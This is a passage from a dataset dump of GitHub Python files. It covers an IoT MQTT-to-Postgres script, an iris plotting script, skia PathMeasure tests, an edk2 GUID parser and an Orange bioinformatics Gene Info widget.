= avg_duration \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint5\") \\\n .foreachBatch(write_to_postgres_avg_duration) \\\n .start()\n\n#mqtt\ndef insert_data(data):\n cur = conn.cursor()\n cur.execute(\"INSERT INTO mqtt_msg (msg) VALUES (%s)\", (data,))\n conn.commit()\n cur.close()\n\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to MQTT broker\")\n client.subscribe(\"esp32\")\n\ndef on_message(client, userdata, msg):\n data = msg.payload.decode()\n print(data)\n insert_data(data)\n with open(\"/home/gharsallah/Downloads/es.csv\", \"a\") as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([data])\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"test.mosquitto.org\", 1883, 60)\n\nclient.loop_forever()\n\nspark.streams.awaitAnyTermination()\n","repo_name":"mohamedgharsallah/Solution-iot-big-data-pour-la-gestion-de-flotte-de-velos","sub_path":"databasestore.py","file_name":"databasestore.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42453051383","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sb\n\n# Assign colum names to the dataset\nnames = ['Sepal.Length', 'Sepal.Width', 'Petal.Length', 'Petal.Width', 'Species']\n\nwith open(\"Gorthi Jaswanth - iris.csv\", 'r') as f:\n with open(\"updated_iris.csv\", 'w') as f1:\n next(f) # skip header line\n for line in f:\n f1.write(line)\n\n# Read dataset to pandas dataframe\ndataset = pd.read_csv(\"updated_iris.csv\", names=names)\n\nprint(dataset)\n# Histogram\nplt.figure(figsize=(10, 7))\nx = dataset[\"Petal.Length\"]\n\nplt.hist(x, bins=100, color=\"blue\")\nplt.title(\"Petal Length in cm\")\nplt.xlabel(\"Petal.Length\")\nplt.ylabel(\"Count\")\nplt.show()\n# --------------------------------------\n# Boxplot\nplt.figure(figsize=(10, 7))\ndataset.boxplot()\nplt.show()\n\n# --------------------------------------\n# ScatterPlot\nplt.scatter(dataset[\"Petal.Length\"], dataset[\"Petal.Width\"])\nplt.xlabel('Petal Length')\nplt.ylabel('Petal Width')\nplt.show()\n# Using Seaborn\n# Histogram\nsb.distplot(dataset[\"Sepal.Length\"], bins=100, kde=False, rug=True, color=\"green\")\nplt.show()\n# --------------------------------------\n# Boxplot\nsb.boxplot(x=dataset[\"Petal.Length\"], y=dataset[\"Species\"], data=dataset)\nplt.show()\n# --------------------------------------\n# ScatterPlot\nsb.scatterplot(x=dataset[\"Petal.Length\"], y=dataset[\"Sepal.Length\"], hue=\"Species\", data=dataset)\nplt.show()","repo_name":"jgorthi/kNN-Algorthim","sub_path":"kNN/Plots.py","file_name":"Plots.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29135886149","text":"import math\nimport skia\nimport pytest\n\n\n@pytest.fixture\ndef path():\n return skia.Path()\n\n\ndef postan(path_measure, offset):\n postan = path_measure.getPosTan(offset)\n assert postan is not None\n return postan\n\n\ndef test_PathMeasure_init(path):\n assert isinstance(skia.PathMeasure(path, False), skia.PathMeasure)\n\n\ndef test_forceclosed(path):\n path.moveTo(0, 0)\n path.lineTo(1, 0)\n path.lineTo(1, 1)\n path.lineTo(0, 1)\n meas = skia.PathMeasure(path, True)\n assert meas.getLength() == 4\n\n\ndef test_345(path):\n path.moveTo(0, 0)\n path.lineTo(3, 4)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 5\n\n\ndef test_circle(path):\n path.addCircle(0, 0, 1)\n meas = skia.PathMeasure(path, False)\n # Test is also commented in skia/tests/PathMeasureTest.cpp\n # assert meas.getLength() == pytest.approx(2 * math.pi)\n\n\ndef test_close_without_move(path):\n path.lineTo(1, 0)\n path.lineTo(1, 1)\n path.lineTo(0, 1)\n path.close()\n path.lineTo(-1, 0)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 4\n meas.nextContour()\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(-0.5)\n assert pos.y() == 0.0\n assert tan.x() == -1.0\n assert tan.y() == 0.0\n\n\ndef test_degenerate(path):\n path.moveTo(0, 0)\n path.lineTo(0, 0)\n path.lineTo(1, 0)\n path.quadTo(1, 0, 1, 0)\n path.quadTo(1, 1, 1, 1 * 2)\n path.cubicTo(1, 2, 1, 2, 1, 2)\n path.cubicTo(2, 2, 3, 2, 4, 2)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 6\n\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(0.5)\n assert pos.y() == 0\n assert tan.x() == 1\n assert tan.y() == 0\n\n (pos, tan) = postan(meas, 2.5)\n assert pos.x() == pytest.approx(1.0)\n assert pos.y() == pytest.approx(1.5)\n assert tan.x() == 0\n assert tan.y() == 1\n\n (pos, tan) = postan(meas, 4.5)\n assert pos.x() == pytest.approx(2.5)\n assert pos.y() == pytest.approx(2.0)\n assert tan.x() == 1\n assert tan.y() == 0\n\n\ndef test_degenerate2(path):\n path.moveTo(0, 0)\n path.lineTo(1, 0)\n path.moveTo(1, 1)\n path.moveTo(2, 2)\n path.lineTo(1, 2)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(0.5)\n assert pos.y() == 0\n assert tan.x() == 1\n assert tan.y() == 0\n\n meas.nextContour()\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(1.5)\n assert pos.y() == pytest.approx(2.0)\n assert tan.x() == -1\n assert tan.y() == 0\n\n\ndef test_conic(path):\n pt = skia.Point(100, 0)\n path.moveTo(0, 0)\n path.conicTo(pt, pt, 1)\n meas = skia.PathMeasure(path, False)\n (stdP, tan) = postan(meas, 20)\n\n path.reset()\n path.moveTo(0, 0)\n path.conicTo(pt, pt, 10)\n meas.setPath(path, False)\n (hiP, tan) = postan(meas, 20)\n assert 19.5 < stdP.x() and stdP.x() < 20.5\n assert 19.5 < hiP.x() and hiP.x() < 20.5\n\n\n# Regression test for b/26425223\ndef test_nextctr(path):\n path.moveTo(0, 0)\n path.lineTo(100, 0)\n\n meas = skia.PathMeasure(path, False)\n # only expect 1 contour, even if we didn't explicitly call getLength() ourselves\n assert not meas.nextContour()\n","repo_name":"kyamagu/skia-python","sub_path":"tests/test_pathmeasure.py","file_name":"test_pathmeasure.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"51"} +{"seq_id":"23395477339","text":"import re\nimport uuid\n\n\nclass GuidParser():\n \"\"\"Provide support functions for converting between different guid formats.\n\n Also support str uuid and uuid to string.\n\n Note:\n C-Format: {0xD3B36F2C, 0xD551, 0x11D4, {0x9A, 0x46, 0x00, 0x90, 0x27, 0x3F, 0xC1, 0x4D}}\n Reg-Format: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\n \"\"\"\n _HexChar = r\"[0-9a-fA-F]\"\n # Regular expression for GUID c structure format\n _GuidCFormatPattern = r\"{{\\s*0[xX]{Hex}{{1,8}}\\s*,\\s*0[xX]{Hex}{{1,4}}\\s*,\\s*0[xX]{Hex}{{1,4}}\" \\\n r\"\\s*,\\s*{{\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*}}\\s*}}\".format(Hex=_HexChar)\n GuidCFormatRegEx = re.compile(r\"{}\".format(_GuidCFormatPattern))\n\n _GuidPattern = r\"{Hex}{{8}}-{Hex}{{4}}-{Hex}{{4}}-{Hex}{{4}}-{Hex}{{12}}\".format(Hex=_HexChar)\n\n # Regular expressions for GUID matching\n GuidRegFormatRegEx = re.compile(r'{}'.format(_GuidPattern))\n\n @classmethod\n def is_guid_in_c_format(cls, guidstring: str) -> bool:\n \"\"\"Determine if guidstring is in c format.\n\n Args:\n guidstring (str): string containing guid\n\n Returns:\n (bool): True if in C format. Otherwise False\n\n \"\"\"\n guidstring = guidstring.strip()\n return cls.GuidCFormatRegEx.match(guidstring)\n\n @classmethod\n def is_guid_in_reg_format(cls, guidstring: str) -> bool:\n \"\"\"Determine if guidstring is in registry format.\n\n Args:\n guidstring (str): string containing guid\n\n Returns:\n (bool): True if in Registry format. Otherwise False\n \"\"\"\n guidstring = guidstring.strip().strip('} {')\n return cls.GuidRegFormatRegEx.match(guidstring)\n\n @classmethod\n def reg_guid_from_c_format(cls, guidstring: str) -> str:\n \"\"\"Convert a c formatted guidstring to a registry formatted guidstring.\n\n Args:\n guidstring (str): c format guidstring\n\n Returns:\n (Success): guidstring in registry format\n (Failure): empty string ''\n \"\"\"\n guidstring = guidstring.strip()\n if not cls.is_guid_in_c_format(guidstring):\n return ''\n\n guidValueString = guidstring.lower().replace(\"{\", \"\").replace(\"}\", \"\").replace(\" \", \"\").replace(\";\", \"\")\n guidValueList = guidValueString.split(\",\")\n if len(guidValueList) != 11:\n return ''\n try:\n return \"%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\" % (\n int(guidValueList[0], 16),\n int(guidValueList[1], 16),\n int(guidValueList[2], 16),\n int(guidValueList[3], 16),\n int(guidValueList[4], 16),\n int(guidValueList[5], 16),\n int(guidValueList[6], 16),\n int(guidValueList[7], 16),\n int(guidValueList[8], 16),\n int(guidValueList[9], 16),\n int(guidValueList[10], 16)\n )\n except Exception:\n return ''\n\n @classmethod\n def c_guid_from_reg_format(cls, guidstring: str) -> str:\n \"\"\"Convert registry format guidstring to c format guidstring.\n\n Args:\n guidstring (str): registry format guidstring\n\n Returns:\n (Success): guidstring in c format\n (Failure): empty string ''\n \"\"\"\n guidstring = guidstring.strip().strip('} {')\n if (not cls.is_guid_in_reg_format(guidstring)):\n return ''\n\n GuidList = guidstring.split('-')\n Result = '{'\n for Index in range(0, 3, 1):\n Result = Result + '0x' + GuidList[Index] + ', '\n Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]\n for Index in range(0, 12, 2):\n Result = Result + ', 0x' + GuidList[4][Index:Index + 2]\n Result += '}}'\n return Result\n\n @classmethod\n def uuid_from_guidstring(cls, guidstring: str) -> uuid.UUID:\n \"\"\"Create a uuid object from the supplied guidstring.\"\"\"\n if (cls.is_guid_in_c_format(guidstring)):\n return uuid.UUID(cls.reg_guid_from_c_format(guidstring))\n elif (cls.is_guid_in_reg_format(guidstring)):\n guidstring = guidstring.strip().strip('} {')\n return uuid.UUID(guidstring)\n else:\n return None\n\n @classmethod\n def c_guid_str_from_uuid(cls, guid: uuid.UUID) -> str:\n \"\"\"Get a C string formatted guidstring from a uuid object.\n\n Args:\n guid (uuid.UUID): valid uuid object\n\n Returns:\n (Success): guidstring in C format\n (Failure): empty string ''\n \"\"\"\n reg = str(guid)\n return cls.c_guid_from_reg_format(reg)\n\n @classmethod\n def reg_guid_str_from_uuid(cls, guid: uuid.UUID) -> str:\n \"\"\"Get a registry string formatted guidstring from a uuid object.\n\n Args:\n guid (uuid.UUID): valid uuid object\n\n Returns:\n (Success): guidstring in registry format\n (Failure): empty string ''\n \"\"\"\n return str(guid)\n","repo_name":"tianocore/edk2-pytool-library","sub_path":"edk2toollib/uefi/edk2/parsers/guid_parser.py","file_name":"guid_parser.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"51"} +{"seq_id":"10087746061","text":"\"\"\"\nGene Info\nDisplays gene information from NCBI and other sources.\n2010\nAles Erjavec (ales.erjavec(@at@)fri.uni-lj.si)\nicons/GeneInfo.svg\n\"\"\"\n\nfrom __future__ import absolute_import, with_statement\n\nimport sys\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom PyQt4.QtCore import pyqtSlot as Slot\n\nimport Orange\n\nfrom orangecontrib.bio.utils import serverfiles\nfrom Orange.utils import lru_cache\n\nfrom Orange.orng.orngDataCaching import data_hints\nfrom Orange.OrangeWidgets import OWGUI\nfrom Orange.OrangeWidgets.OWGUI import LinkStyledItemDelegate, LinkRole\n\nfrom Orange.OrangeWidgets.OWWidget import *\n\nfrom Orange.OrangeWidgets.OWConcurrent import \\\n ThreadExecutor, Task, methodinvoke\n\n\nfrom .. import gene, taxonomy\nfrom .utils import download\n\n\nNAME = \"Gene Info\"\nDESCRIPTION = \"Displays gene information from NCBI and other sources.\"\nICON = \"icons/GeneInfo.svg\"\nPRIORITY = 2010\n\nINPUTS = [(\"Examples\", Orange.data.Table, \"setData\")]\nOUTPUTS = [(\"Selected Examples\", Orange.data.Table)]\n\nREPLACES = [\"_bioinformatics.widgets.OWGeneInfo.OWGeneInfo\"]\n\n\nclass TreeModel(QAbstractItemModel):\n\n def __init__(self, data, header, parent):\n QAbstractItemModel.__init__(self, parent)\n self._data = [[QVariant(s) for s in row] for row in data]\n self._dataDict = {}\n self._header = header\n self._roleData = {Qt.DisplayRole: self._data}\n self._roleData = partial(\n defaultdict,\n partial(defaultdict,\n partial(defaultdict, QVariant)))(self._roleData)\n\n def setColumnLinks(self, column, links):\n font = QFont()\n font.setUnderline(True)\n font = QVariant(font)\n for i, link in enumerate(links):\n self._roleData[LinkRole][i][column] = QVariant(link)\n self._roleData[Qt.FontRole][i][column] = font\n self._roleData[Qt.ForegroundRole][i][column] = \\\n QVariant(QColor(Qt.blue))\n\n def setRoleData(self, role, row, col, data):\n self._roleData[role][row][col] = data\n\n def data(self, index, role=Qt.DisplayRole):\n row, col = index.row(), index.column()\n return self._roleData[role][row][col]\n\n def index(self, row, col, parent=QModelIndex()):\n return self.createIndex(row, col, 0)\n\n def parent(self, index):\n return QModelIndex()\n\n def rowCount(self, index=QModelIndex()):\n if index.isValid():\n return 0\n else:\n return len(self._data)\n\n def columnCount(self, index=QModelIndex()):\n return len(self._header)\n\n def headerData(self, section, orientation, role=Qt.DisplayRole):\n if role == Qt.DisplayRole:\n return QVariant(self._header[section])\n return QVariant()\n\n\nclass LinkFmt(object):\n\n def __init__(self, link_fmt, name):\n self.link_fmt = link_fmt\n self.name = name\n\n def format(self, *args, **kwargs):\n return Link(self.link_fmt.format(*args, **kwargs), **kwargs)\n\n def __repr__(self):\n return \"\"\n\n def __str__(self):\n return self.name\n\n\nclass Link(object):\n\n def __init__(self, link, text=None, **kwargs):\n self.link = link\n self.text = text if text is not None else \"link\"\n self.__dict__.update(kwargs)\n\n\n@lru_cache(maxsize=2)\ndef get_ncbi_info(taxid):\n return gene.NCBIGeneInfo(taxid)\n\n\ndef ncbi_info(taxid, genes, advance=None):\n taxid = gene.NCBIGeneInfo.TAX_MAP.get(taxid, taxid)\n download.ensure_downloaded(\n \"NCBI_geneinfo\",\n \"gene_info.%s.db\" % taxid,\n advance\n )\n info = get_ncbi_info(taxid)\n\n schema_link = LinkFmt(\n \"http://www.ncbi.nlm.nih.gov/sites/entrez?Db=gene&Cmd=ShowDetailView&TermToSearch={gene_id}\",\n name=\"NCBI ID\")\n\n schema = [schema_link, \"Symbol\", \"Locus Tag\", \"Chromosome\",\n \"Description\", \"Synonyms\", \"Nomenclature\"]\n ret = []\n for gene_name in genes:\n gi = info.get_info(gene_name)\n if gi:\n ret.append([schema_link.format(gene_id=gi.gene_id, text=gi.gene_id),\n gi.symbol + \" (%s)\" % gene_name if gene_name != gi.symbol else gi.symbol,\n gi.locus_tag or \"\",\n gi.chromosome or \"\",\n gi.description or \"\",\n \", \".join(gi.synonyms),\n gi.symbol_from_nomenclature_authority or \"\"\n ])\n else:\n ret.append(None)\n return schema, ret\n\n\ndef dicty_info(taxid, genes, advance=None):\n from .. import dicty\n download.ensure_downloaded(\n dicty.DictyBase.domain,\n dicty.DictyBase.filename,\n advance\n )\n info = dicty.DictyBase()\n name_matcher = gene.GMDicty()\n name_matcher.set_targets(info.info.keys())\n schema_link = LinkFmt(\n \"http://dictybase.org/db/cgi-bin/gene_page.pl?dictybaseid={gene_id}\",\n name=\"Dicty Base Id\")\n schema = [schema_link, \"Name\", \"Synonyms\", \"Gene Products\"]\n\n ret = []\n for gene_name in genes:\n gene_name = name_matcher.umatch(gene_name)\n gi = info.info.get(gene_name, None)\n if gi:\n ret.append([schema_link.format(gene_id=gene_name, text=gene_name),\n gi[0] + \" (%s)\" % gene_name if gene_name != gi[0] else gi[0], # Gene Name\n \", \".join(gi[1]), # Synonyms\n gi[2] or \"\", # Gene Products\n ])\n\n else:\n ret.append(None)\n\n return schema, ret\n\n\nINFO_SOURCES = {\n \"default\": [(\"NCBI Info\", ncbi_info)],\n \"352472\": [(\"NCBI Info\", ncbi_info),\n (\"Dicty Base\", dicty_info)]\n}\n\n\nclass OWGeneInfo(OWWidget):\n settingsList = [\"organismIndex\", \"geneAttr\", \"useAttr\", \"autoCommit\",\n \"taxid\"]\n contextHandlers = {\n \"\": DomainContextHandler(\n \"\", [\"organismIndex\", \"geneAttr\", \"useAttr\", \"useAltSource\",\n \"taxid\"]\n )\n }\n\n def __init__(self, parent=None, signalManager=None, name=\"Gene Info\"):\n OWWidget.__init__(self, parent, signalManager, name)\n\n self.inputs = [(\"Examples\", Orange.data.Table, self.setData)]\n self.outputs = [(\"Selected Examples\", Orange.data.Table)]\n\n self.organismIndex = 0\n self.taxid = None\n self.geneAttr = 0\n self.useAttr = False\n self.autoCommit = False\n self.searchString = \"\"\n self.selectionChangedFlag = False\n self.useAltSource = 0\n self.loadSettings()\n\n self.__initialized = False\n self.initfuture = None\n self.itemsfuture = None\n\n self.infoLabel = OWGUI.widgetLabel(\n OWGUI.widgetBox(self.controlArea, \"Info\", addSpace=True),\n \"Initializing\\n\"\n )\n\n self.organisms = None\n self.organismBox = OWGUI.widgetBox(\n self.controlArea, \"Organism\", addSpace=True)\n\n self.organismComboBox = OWGUI.comboBox(\n self.organismBox, self, \"organismIndex\",\n callback=self._onSelectedOrganismChanged,\n debuggingEnabled=0)\n\n # For now only support one alt source, with a checkbox\n # In the future this can be extended to multiple selections\n self.altSourceCheck = OWGUI.checkBox(self.organismBox, self,\n \"useAltSource\", \"Show information from dictyBase\",\n callback=self.onAltSourceChange,\n# debuggingEnabled=0,\n )\n self.altSourceCheck.hide()\n\n box = OWGUI.widgetBox(self.controlArea, \"Gene names\", addSpace=True)\n self.geneAttrComboBox = OWGUI.comboBox(\n box, self, \"geneAttr\",\n \"Gene atttibute\", callback=self.updateInfoItems\n )\n OWGUI.checkBox(box, self, \"useAttr\", \"Use attribute names\",\n callback=self.updateInfoItems,\n disables=[(-1, self.geneAttrComboBox)])\n\n self.geneAttrComboBox.setDisabled(bool(self.useAttr))\n\n box = OWGUI.widgetBox(self.controlArea, \"Commit\", addSpace=True)\n b = OWGUI.button(box, self, \"Commit\", callback=self.commit)\n c = OWGUI.checkBox(box, self, \"autoCommit\", \"Commit on change\")\n OWGUI.setStopper(self, b, c, \"selectionChangedFlag\",\n callback=self.commit)\n\n # A label for dictyExpress link\n self.dictyExpressBox = OWGUI.widgetBox(\n self.controlArea, \"Dicty Express\")\n self.linkLabel = OWGUI.widgetLabel(self.dictyExpressBox, \"\")\n self.linkLabel.setOpenExternalLinks(False)\n self.connect(self.linkLabel, SIGNAL(\"linkActivated(QString)\"),\n self.onDictyExpressLink)\n self.dictyExpressBox.hide()\n\n OWGUI.rubber(self.controlArea)\n\n OWGUI.lineEdit(self.mainArea, self, \"searchString\", \"Filter\",\n callbackOnType=True, callback=self.searchUpdate)\n\n self.treeWidget = QTreeView(self.mainArea)\n self.treeWidget.setRootIsDecorated(False)\n self.treeWidget.setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n self.treeWidget.setItemDelegate(\n LinkStyledItemDelegate(self.treeWidget))\n self.treeWidget.setUniformRowHeights(True)\n self.treeWidget.viewport().setMouseTracking(True)\n self.treeWidget.setSortingEnabled(True)\n self.mainArea.layout().addWidget(self.treeWidget)\n\n box = OWGUI.widgetBox(self.mainArea, \"\",\n orientation=\"horizontal\")\n OWGUI.button(box, self, \"Select Filtered\",\n callback=self.selectFiltered)\n OWGUI.button(box, self, \"Clear Selection\",\n callback=self.treeWidget.clearSelection)\n\n self.resize(1000, 700)\n\n self.geneinfo = []\n self.cells = []\n self.row2geneinfo = {}\n self.data = None\n\n # : (# input genes, # matches genes)\n self.matchedInfo = 0, 0\n self.selectionUpdateInProgress = False\n\n self.setBlocking(True)\n self.executor = ThreadExecutor(self)\n\n self.progressBarInit()\n\n task = Task(\n function=partial(\n taxonomy.ensure_downloaded,\n callback=methodinvoke(self, \"advance\", ())\n )\n )\n\n task.resultReady.connect(self.initialize)\n task.exceptionReady.connect(self._onInitializeError)\n\n self.initfuture = self.executor.submit(task)\n\n @Slot()\n def advance(self):\n assert self.thread() is QThread.currentThread()\n\n self.progressBarSet(self.progressBarValue + 1,\n processEventsFlags=None)\n\n def initialize(self):\n if self.__initialized:\n # Already initialized\n return\n\n self.progressBarFinished()\n\n self.organisms = sorted(\n set([name.split(\".\")[-2] for name in\n serverfiles.listfiles(\"NCBI_geneinfo\")] +\n gene.NCBIGeneInfo.essential_taxids())\n )\n\n self.organismComboBox.addItems(\n [taxonomy.name(tax_id) for tax_id in self.organisms]\n )\n if self.taxid in self.organisms:\n self.organismIndex = self.organisms.index(self.taxid)\n\n self.infoLabel.setText(\"No data on input\\n\")\n self.__initialized = True\n self.initfuture = None\n\n self.setBlocking(False)\n\n def _onInitializeError(self, exc):\n sys.excepthook(type(exc), exc.args, None)\n self.error(0, \"Could not download the necessary files.\")\n\n def _onSelectedOrganismChanged(self):\n self.taxid = self.organisms[self.organismIndex]\n if self.data is not None:\n self.updateInfoItems()\n\n def setData(self, data=None):\n if not self.__initialized:\n self.initfuture.result()\n self.initialize()\n\n if self.itemsfuture is not None:\n raise Exception(\"Already processing\")\n\n self.closeContext()\n self.data = data\n\n if data:\n self.geneAttrComboBox.clear()\n self.attributes = \\\n [attr for attr in (data.domain.variables +\n data.domain.getmetas().values())\n if isinstance(attr, (Orange.feature.String,\n Orange.feature.Discrete))]\n\n self.geneAttrComboBox.addItems(\n [attr.name for attr in self.attributes]\n )\n\n self.taxid = data_hints.get_hint(self.data, \"taxid\", self.taxid)\n self.useAttr = data_hints.get_hint(\n self.data, \"genesinrows\", self.useAttr)\n\n self.openContext(\"\", data)\n self.geneAttr = min(self.geneAttr, len(self.attributes) - 1)\n\n if self.taxid in self.organisms:\n self.organismIndex = self.organisms.index(self.taxid)\n\n self.updateInfoItems()\n else:\n self.clear()\n\n def infoSource(self):\n \"\"\" Return the current selected info source getter function from\n INFO_SOURCES\n \"\"\"\n org = self.organisms[min(self.organismIndex, len(self.organisms) - 1)]\n if org not in INFO_SOURCES:\n org = \"default\"\n sources = INFO_SOURCES[org]\n name, func = sources[min(self.useAltSource, len(sources) - 1)]\n return name, func\n\n def inputGenes(self):\n if self.useAttr:\n genes = [attr.name for attr in self.data.domain.attributes]\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n genes = [str(ex[attr]) for ex in self.data\n if not ex[attr].isSpecial()]\n else:\n genes = []\n return genes\n\n def updateInfoItems(self):\n self.warning(0)\n if not self.data:\n return\n\n genes = self.inputGenes()\n if self.useAttr:\n genes = [attr.name for attr in self.data.domain.attributes]\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n genes = [str(ex[attr]) for ex in self.data\n if not ex[attr].isSpecial()]\n else:\n genes = []\n if not genes:\n self.warning(0, \"Could not extract genes from input dataset.\")\n\n self.warning(1)\n org = self.organisms[min(self.organismIndex, len(self.organisms) - 1)]\n source_name, info_getter = self.infoSource()\n\n self.error(0)\n\n self.updateDictyExpressLink(genes, show=org == \"352472\")\n self.altSourceCheck.setVisible(org == \"352472\")\n\n self.progressBarInit()\n self.setBlocking(True)\n self.setEnabled(False)\n self.infoLabel.setText(\"Retrieving info records.\\n\")\n\n self.genes = genes\n\n task = Task(\n function=partial(\n info_getter, org, genes,\n advance=methodinvoke(self, \"advance\", ()))\n )\n self.itemsfuture = self.executor.submit(task)\n task.finished.connect(self._onItemsCompleted)\n\n def _onItemsCompleted(self):\n self.setBlocking(False)\n self.progressBarFinished()\n self.setEnabled(True)\n\n try:\n schema, geneinfo = self.itemsfuture.result()\n finally:\n self.itemsfuture = None\n\n self.geneinfo = geneinfo = list(zip(self.genes, geneinfo))\n self.cells = cells = []\n self.row2geneinfo = {}\n links = []\n for i, (_, gi) in enumerate(geneinfo):\n if gi:\n row = []\n for _, item in zip(schema, gi):\n if isinstance(item, Link):\n # TODO: This should be handled by delegates\n row.append(item.text)\n links.append(item.link)\n else:\n row.append(item)\n cells.append(row)\n self.row2geneinfo[len(cells) - 1] = i\n\n model = TreeModel(cells, [str(col) for col in schema], None)\n\n model.setColumnLinks(0, links)\n proxyModel = QSortFilterProxyModel(self)\n proxyModel.setSourceModel(model)\n self.treeWidget.setModel(proxyModel)\n self.connect(self.treeWidget.selectionModel(),\n SIGNAL(\"selectionChanged(QItemSelection , QItemSelection )\"),\n self.commitIf)\n\n for i in range(7):\n self.treeWidget.resizeColumnToContents(i)\n self.treeWidget.setColumnWidth(\n i, min(self.treeWidget.columnWidth(i), 200)\n )\n\n self.infoLabel.setText(\"%i genes\\n%i matched NCBI's IDs\" %\n (len(self.genes), len(cells)))\n self.matchedInfo = len(self.genes), len(cells)\n\n def clear(self):\n self.infoLabel.setText(\"No data on input\\n\")\n self.treeWidget.setModel(\n TreeModel([], [\"NCBI ID\", \"Symbol\", \"Locus Tag\",\n \"Chromosome\", \"Description\", \"Synonyms\",\n \"Nomenclature\"], self.treeWidget))\n\n self.geneAttrComboBox.clear()\n self.send(\"Selected Examples\", None)\n\n def commitIf(self, *args):\n if self.autoCommit and not self.selectionUpdateInProgress:\n self.commit()\n else:\n self.selectionChangedFlag = True\n\n def commit(self):\n if not self.data:\n return\n model = self.treeWidget.model()\n mapToSource = model.mapToSource\n selectedRows = self.treeWidget.selectedIndexes()\n selectedRows = [mapToSource(index).row() for index in selectedRows]\n model = model.sourceModel()\n\n selectedGeneids = [self.row2geneinfo[row] for row in selectedRows]\n selectedIds = [self.geneinfo[i][0] for i in selectedGeneids]\n selectedIds = set(selectedIds)\n gene2row = dict((self.geneinfo[self.row2geneinfo[row]][0], row)\n for row in selectedRows)\n\n if self.useAttr:\n def is_selected(attr):\n return attr.name in selectedIds\n attrs = [attr for attr in self.data.domain.attributes\n if is_selected(attr)]\n domain = Orange.data.Domain(attrs, self.data.domain.classVar)\n domain.addmetas(self.data.domain.getmetas())\n newdata = Orange.data.Table(domain, self.data)\n self.send(\"Selected Examples\", newdata)\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n examples = [ex for ex in self.data if str(ex[attr]) in selectedIds]\n # Add gene info\n domain = Orange.data.Domain(\n self.data.domain, self.data.domain.classVar)\n domain.addmetas(self.data.domain.getmetas())\n n_columns = model.columnCount()\n\n headers = [str(model.headerData(i, Qt.Horizontal, Qt.DisplayRole)\n .toString())\n for i in range(n_columns)]\n new_meta_attrs = [(Orange.feature.Descriptor.new_meta_id(),\n Orange.feature.String(name))\n for name in headers]\n domain.addmetas(dict(new_meta_attrs))\n examples = [Orange.data.Instance(domain, ex) for ex in examples]\n for ex in examples:\n for i, (_, meta) in enumerate(new_meta_attrs):\n index = model.index(gene2row[str(ex[attr])], i)\n ex[meta] = str(\n model.data(index, Qt.DisplayRole).toString()\n )\n\n if examples:\n newdata = Orange.data.Table(examples)\n else:\n newdata = None\n self.send(\"Selected Examples\", newdata)\n else:\n self.send(\"Selected Examples\", None)\n\n def rowFiltered(self, row):\n searchStrings = self.searchString.lower().split()\n row = unicode(\" \".join(self.cells[row]).lower(), errors=\"ignore\")\n return not all([s in row for s in searchStrings])\n\n def searchUpdate(self):\n if not self.data:\n return\n searchStrings = self.searchString.lower().split()\n index = self.treeWidget.model().sourceModel().index\n mapFromSource = self.treeWidget.model().mapFromSource\n for i, row in enumerate(self.cells):\n row = unicode(\" \".join(row).lower(), errors=\"ignore\")\n self.treeWidget.setRowHidden(\n mapFromSource(index(i, 0)).row(),\n QModelIndex(),\n not all([s in row for s in searchStrings]))\n\n def selectFiltered(self):\n if not self.data:\n return\n itemSelection = QItemSelection()\n\n index = self.treeWidget.model().sourceModel().index\n mapFromSource = self.treeWidget.model().mapFromSource\n for i, row in enumerate(self.cells):\n if not self.rowFiltered(i):\n itemSelection.select(mapFromSource(index(i, 0)),\n mapFromSource(index(i, 0)))\n self.treeWidget.selectionModel().select(\n itemSelection,\n QItemSelectionModel.Select | QItemSelectionModel.Rows)\n\n def sendReport(self):\n from Orange.OrangeWidgets import OWReport\n genes, matched = self.matchedInfo\n\n if self.organisms:\n org = self.organisms[min(self.organismIndex,\n len(self.organisms) - 1)]\n org_name = taxonomy.name(org)\n else:\n org = None\n org_name = None\n if self.data is not None:\n self.reportRaw(\n \"

    Input: %i genes of which %i (%.1f%%) matched NCBI synonyms\"\n \"
    \"\n \"Organism: %s\"\n \"
    \"\n \"Filter: %s\"\n \"

    \" % (genes, matched, 100.0 * matched / genes, org_name,\n self.searchString)\n )\n self.reportSubsection(\"Gene list\")\n self.reportRaw(reportItemView(self.treeWidget))\n else:\n self.reportRaw(\"

